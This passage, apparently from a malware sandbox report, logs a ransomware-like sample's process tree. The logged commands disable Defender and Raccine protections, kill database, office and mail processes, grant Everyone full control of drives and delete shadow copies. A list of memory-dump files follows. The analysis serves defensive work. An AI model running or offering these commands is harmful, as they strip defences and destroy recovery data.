                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                        "powershell" Get-MpPreference -verbose
                                                                                                                                                        3⤵
                                                                                                                                                          PID:4568
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true
                                                                                                                                                          3⤵
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:4372
                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true
                                                                                                                                                          3⤵
                                                                                                                                                            PID:4236
                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true
                                                                                                                                                            3⤵
                                                                                                                                                              PID:4356
                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true
                                                                                                                                                              3⤵
                                                                                                                                                                PID:4336
                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:2180
                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:1584
                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:4844
                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:4928
                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:4468
                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:4276
                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:4484
                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2
                                                                                                                                                                              3⤵
                                                                                                                                                                                PID:4172
                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                "taskkill" /F /IM RaccineSettings.exe
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                PID:1764
                                                                                                                                                                              • C:\Windows\system32\reg.exe
                                                                                                                                                                                "reg" delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Raccine Tray" /F
                                                                                                                                                                                3⤵
                                                                                                                                                                                  PID:3524
                                                                                                                                                                                • C:\Windows\system32\reg.exe
                                                                                                                                                                                  "reg" delete HKCU\Software\Raccine /F
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies registry key
                                                                                                                                                                                  PID:2184
                                                                                                                                                                                • C:\Windows\system32\schtasks.exe
                                                                                                                                                                                  "schtasks" /DELETE /TN "Raccine Rules Updater" /F
                                                                                                                                                                                  3⤵
                                                                                                                                                                                    PID:4708
                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                      4⤵
                                                                                                                                                                                        PID:4696
                                                                                                                                                                                    • C:\Windows\system32\netsh.exe
                                                                                                                                                                                      "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
                                                                                                                                                                                      3⤵
                                                                                                                                                                                        PID:3532
                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                        "sc.exe" config Dnscache start= auto
                                                                                                                                                                                        3⤵
                                                                                                                                                                                          PID:4632
                                                                                                                                                                                        • C:\Windows\system32\sc.exe
                                                                                                                                                                                          "sc.exe" config SQLTELEMETRY start= disabled
                                                                                                                                                                                          3⤵
                                                                                                                                                                                            PID:5028
                                                                                                                                                                                          • C:\Windows\system32\sc.exe
                                                                                                                                                                                            "sc.exe" config FDResPub start= auto
                                                                                                                                                                                            3⤵
                                                                                                                                                                                              PID:4448
                                                                                                                                                                                            • C:\Windows\system32\sc.exe
                                                                                                                                                                                              "sc.exe" config SSDPSRV start= auto
                                                                                                                                                                                              3⤵
                                                                                                                                                                                                PID:4620
                                                                                                                                                                                              • C:\Windows\system32\sc.exe
                                                                                                                                                                                                "sc.exe" config SstpSvc start= disabled
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                  PID:4252
                                                                                                                                                                                                • C:\Windows\system32\sc.exe
                                                                                                                                                                                                  "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                    PID:1536
                                                                                                                                                                                                    • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                      4⤵
                                                                                                                                                                                                        PID:4132
                                                                                                                                                                                                    • C:\Windows\system32\sc.exe
                                                                                                                                                                                                      "sc.exe" config upnphost start= auto
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                        PID:4888
                                                                                                                                                                                                      • C:\Windows\system32\sc.exe
                                                                                                                                                                                                        "sc.exe" config SQLWriter start= disabled
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                          PID:5144
                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                          "taskkill.exe" /IM synctime.exe /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:5228
                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                          "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:5220
                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                          "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:5212
                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                          "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:5412
                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                          "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:5504
                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                          "taskkill.exe" /IM sqbcoreservice.exe /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                          PID:5540
                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                          "taskkill.exe" /IM Ntrtscan.exe /F
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                            PID:5548
                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                            "taskkill.exe" /IM agntsvc.exe /F
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                              PID:5788
                                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                              "taskkill.exe" /IM mysqld.exe /F
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                PID:5984
                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                "taskkill.exe" /IM isqlplussvc.exe /F
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                PID:6016
                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                "taskkill.exe" /IM firefoxconfig.exe /F
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                PID:6024
                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                "taskkill.exe" /IM onenote.exe /F
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                  PID:6116
                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                  "taskkill.exe" /IM thebat.exe /F
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:1228
                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                  "taskkill.exe" /IM steam.exe /F
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:3808
                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                  "taskkill.exe" /IM PccNTMon.exe /F
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:5168
                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                  "taskkill.exe" /IM sqlwriter.exe /F
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                    PID:4888
                                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                    "taskkill.exe" /IM msftesql.exe /F
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                    PID:4632
                                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                    "taskkill.exe" /IM ocomm.exe /F
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                      PID:5424
                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                      "taskkill.exe" /IM encsvc.exe /F
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                      PID:5268
                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                      "taskkill.exe" /IM msaccess.exe /F
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                        PID:5296
                                                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                        "taskkill.exe" /IM powerpnt.exe /F
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                          PID:4340
                                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                          "taskkill.exe" /IM tbirdconfig.exe /F
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                            PID:5668
                                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                            "taskkill.exe" /IM infopath.exe /F
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                              PID:5512
                                                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                              "taskkill.exe" /IM excel.exe /F
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                              PID:5728
                                                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                              "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                PID:5580
                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                "taskkill.exe" /IM dbeng50.exe /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:6128
                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                "taskkill.exe" /IM outlook.exe /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Kills process with taskkill
                                                                                                                                                                                                                                PID:5864
                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                "taskkill.exe" /IM mbamtray.exe /F
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                  PID:2736
                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                  "taskkill.exe" /IM CNTAoSMgr.exe /F
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                    PID:2720
                                                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                    "taskkill.exe" /IM visio.exe /F
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                      PID:4292
                                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                      "taskkill.exe" /IM tmlisten.exe /F
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                        PID:6088
                                                                                                                                                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                            PID:2008
                                                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                          "taskkill.exe" /IM zoolz.exe /F
                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                            PID:6076
                                                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                            "taskkill.exe" /IM thebat64.exe /F
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                            PID:6068
                                                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                            "taskkill.exe" IM thunderbird.exe /F
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                            PID:4912
                                                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                            "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                            PID:5504
                                                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                            "taskkill.exe" /IM mysqld-nt.exe /F
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                            PID:5024
                                                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                            "taskkill.exe" /IM dbsnmp.exe /F
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                            PID:5696
                                                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                            "taskkill.exe" /IM sqlservr.exe /F
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                            • Kills process with taskkill
                                                                                                                                                                                                                                            PID:5012
                                                                                                                                                                                                                                          • C:\Windows\system32\netsh.exe
                                                                                                                                                                                                                                            "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                              PID:5104
                                                                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                              "taskkill.exe" /IM wordpad.exe /F
                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                                                              PID:4520
                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                  PID:5064
                                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                "taskkill.exe" /IM winword.exe /F
                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                  PID:1768
                                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                  "taskkill.exe" /IM mysqld-opt.exe /F
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                  PID:4672
                                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                  "taskkill.exe" /IM xfssvccon.exe /F
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                  PID:5308
                                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                  "taskkill.exe" /IM ocautoupds.exe /F
                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                    PID:5488
                                                                                                                                                                                                                                                  • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                    "taskkill.exe" /IM ocssd.exe /F
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                    • Kills process with taskkill
                                                                                                                                                                                                                                                    PID:4764
                                                                                                                                                                                                                                                  • C:\Windows\system32\arp.exe
                                                                                                                                                                                                                                                    "arp" -a
                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                      PID:4356
                                                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                      "taskkill.exe" /IM oracle.exe /F
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                                                                                                                      PID:5028
                                                                                                                                                                                                                                                    • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                      "taskkill.exe" /IM sqlagent.exe /F
                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                        PID:3672
                                                                                                                                                                                                                                                      • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                        "taskkill.exe" /IM sqlbrowser.exe /F
                                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                                          PID:5368
                                                                                                                                                                                                                                                        • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                          "taskkill.exe" /IM sqld.exe /f
                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                            PID:4360
                                                                                                                                                                                                                                                          • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                            "taskkill.exe" /IM mysqld.exe /f
                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                              PID:508
                                                                                                                                                                                                                                                            • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                              "taskkill.exe" /IM sql.exe /f
                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                PID:4984
                                                                                                                                                                                                                                                              • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                                "taskkill.exe" /IM oracle.exe /f
                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                  PID:4700
                                                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                                  "taskkill.exe" /IM mysql.exe /f
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                  PID:2176
                                                                                                                                                                                                                                                                • C:\Windows\system32\taskkill.exe
                                                                                                                                                                                                                                                                  "taskkill.exe" /IM vmwp.exe /f
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                                                                  PID:4188
                                                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                  "icacls" "D:*" /grant Everyone:F /T /C /Q
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:2828
                                                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                  "icacls" "Z:*" /grant Everyone:F /T /C /Q
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:4976
                                                                                                                                                                                                                                                                • C:\Windows\system32\icacls.exe
                                                                                                                                                                                                                                                                  "icacls" "C:*" /grant Everyone:F /T /C /Q
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                                                  PID:4844
                                                                                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                                                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                                                    PID:3280
                                                                                                                                                                                                                                                                  • C:\Windows\system32\cmd.exe
                                                                                                                                                                                                                                                                    "cmd.exe" /C C:\Windows\TEMP\tmp6B97.bat
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                      PID:5516
                                                                                                                                                                                                                                                                      • C:\Windows\system32\mountvol.exe
                                                                                                                                                                                                                                                                        mountvol
                                                                                                                                                                                                                                                                        4⤵
                                                                                                                                                                                                                                                                          PID:800
                                                                                                                                                                                                                                                                        • C:\Windows\system32\find.exe
                                                                                                                                                                                                                                                                          find "}\"
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:1820
                                                                                                                                                                                                                                                                          • C:\Windows\system32\mountvol.exe
                                                                                                                                                                                                                                                                            mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-500600000000}\
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:2436
                                                                                                                                                                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                              ping -n 2 127.0.0.1
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                                                                                                              PID:4956
                                                                                                                                                                                                                                                                            • C:\Windows\system32\mountvol.exe
                                                                                                                                                                                                                                                                              mountvol !freedrive!: \\?\Volume{266d1ca4-0000-0000-0000-100000000000}\
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                                PID:5856
                                                                                                                                                                                                                                                                              • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                ping -n 2 127.0.0.1
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                                                                                                                                PID:5552
                                                                                                                                                                                                                                                                              • C:\Windows\system32\mountvol.exe
                                                                                                                                                                                                                                                                                mountvol !freedrive!: \\?\Volume{63e50be4-9a0d-11eb-a110-806e6f6e6963}\
                                                                                                                                                                                                                                                                                4⤵
                                                                                                                                                                                                                                                                                  PID:5764
                                                                                                                                                                                                                                                                                • C:\Windows\system32\PING.EXE
                                                                                                                                                                                                                                                                                  ping -n 2 127.0.0.1
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                                                                                                                                  PID:5220

                                                                                                                                                                                                                                                                          Network

                                                                                                                                                                                                                                                                          MITRE ATT&CK Enterprise v6

                                                                                                                                                                                                                                                                          Replay Monitor

                                                                                                                                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                                                                                                                                          Downloads

                                                                                                                                                                                                                                                                          • memory/1128-334-0x00000207301C3000-0x00000207301C5000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1128-333-0x00000207301C0000-0x00000207301C2000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1240-196-0x00000286EE700000-0x00000286EE702000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1240-200-0x00000286EE703000-0x00000286EE705000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1240-252-0x00000286EE708000-0x00000286EE709000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/1240-223-0x00000286EE706000-0x00000286EE708000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1428-247-0x0000029860EF6000-0x0000029860EF8000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1428-209-0x0000029860EF0000-0x0000029860EF2000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1428-268-0x0000029860EF8000-0x0000029860EF9000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/1428-211-0x0000029860EF3000-0x0000029860EF5000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1764-219-0x00000157D2783000-0x00000157D2785000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1764-241-0x00000157D2786000-0x00000157D2788000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1764-218-0x00000157D2780000-0x00000157D2782000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/1764-267-0x00000157D2788000-0x00000157D2789000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/2248-186-0x000001C53B046000-0x000001C53B048000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/2248-135-0x000001C53B043000-0x000001C53B045000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/2248-134-0x000001C53B040000-0x000001C53B042000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/2476-231-0x000001ED2D4E6000-0x000001ED2D4E8000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/2476-207-0x000001ED2D4E0000-0x000001ED2D4E2000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/2476-262-0x000001ED2D4E8000-0x000001ED2D4E9000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/2476-212-0x000001ED2D4E3000-0x000001ED2D4E5000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/2528-201-0x00000220FC8C0000-0x00000220FC8C2000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/2528-230-0x00000220FC8C6000-0x00000220FC8C8000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/2528-206-0x00000220FC8C3000-0x00000220FC8C5000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                          • memory/2528-261-0x00000220FC8C8000-0x00000220FC8C9000-memory.dmp

                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                          • memory/3468-198-0x00000289B2B33000-0x00000289B2B35000-memory.dmp

